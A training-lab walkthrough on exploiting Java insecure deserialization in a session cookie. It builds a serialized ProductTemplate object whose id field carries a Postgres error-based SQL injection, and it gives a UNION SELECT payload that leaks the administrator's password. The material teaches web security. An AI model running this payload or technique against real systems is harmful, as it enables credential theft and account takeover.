Lab: Developing a custom gadget chain for Java deserialization
This lab uses a serialization-based session mechanism. If you can construct a suitable gadget chain, you can exploit this lab's insecure deserialization to obtain the administrator's password.
To solve the lab, gain access to the source code and use it to construct a gadget chain to obtain the administrator's password. Then, log in as the
administrator and delete Carlos's account.
You can access your own account using the following credentials:
Note that solving this lab requires basic familiarity with another topic that we've covered on the Web Security Academy.
To save you some of the effort, we've provided a generic Java program for serializing objects. You can adapt this to generate a suitable object for your exploit. If you don't already have a Java environment set up, you can compile and execute the program using a browser-based IDE, such as
- Log in to your own account and notice the session cookie contains a serialized Java object.
From the site map, notice that the website references the file
/backup/AccessTokenUser.java. You can successfully request this file in Burp Repeater.
Browse upward to the
/backupdirectory and notice that it also contains a
Notice that the
ProductTemplate.readObject()method passes the template's
idattribute into a SQL statement.
Based on the leaked source code, write a small Java program that instantiates a
ProductTemplatewith an arbitrary
id, serializes it, and then Base64-encodes it.
Note: In case you got stuck, we've also provided a ready-to-use program that you can use instead - all you need to change is the
"your-payload-here"string in the
Use your Java program to create a
idset to a single apostrophe. Copy the Base64 string and submit it in a request as your session cookie. The error message confirms that the website is vulnerable to Postgres-based SQL injection via this deserialized object.
Having identified this vulnerability, there are multiple techniques you can use to extract the password. For this example solution, we'll use an error-based attack.
Note: At this point, you have the following options for working with your payload:
Make changes to the
idattribute in your Java file, recompile it, and paste the new value into your session cookie manually.
Alternatively, you can use the Hackvertor extension. If you use Hackvertor, you can paste the raw serialized object into Burp Repeater, and then add rules to update the offsets automatically. You can then make changes to the payload directly in Burp Repeater.
If you've not used Hackvertor before, you can use the following template. We've Base64-encoded it to avoid copy & paste issues. You will need to paste it into your session cookie in Burp Repeater, then Base64-decode it. You can then modify
add-your-payload-hereto be whatever payload you want. You don't need to change anything else - any adjustments to the offsets and encoding will be handled automatically by Hackvertor.
- Make changes to the
idattribute to construct a basic
UNIONattack on the
userstable. Enumerate the number of columns (8) and observe that columns 4, 5, and 6 do not expect a string.
userstable using standard SQL injection techniques.
Use a suitable payload to extract the password. For example, the following payload will trigger an exception that displays the password in the error message:
' UNION SELECT NULL, NULL, NULL, cast(password as numeric), NULL, NULL, NULL, NULL FROM users--
- To solve the lab, log in using the extracted password, open the admin panel, and delete Carlos's account.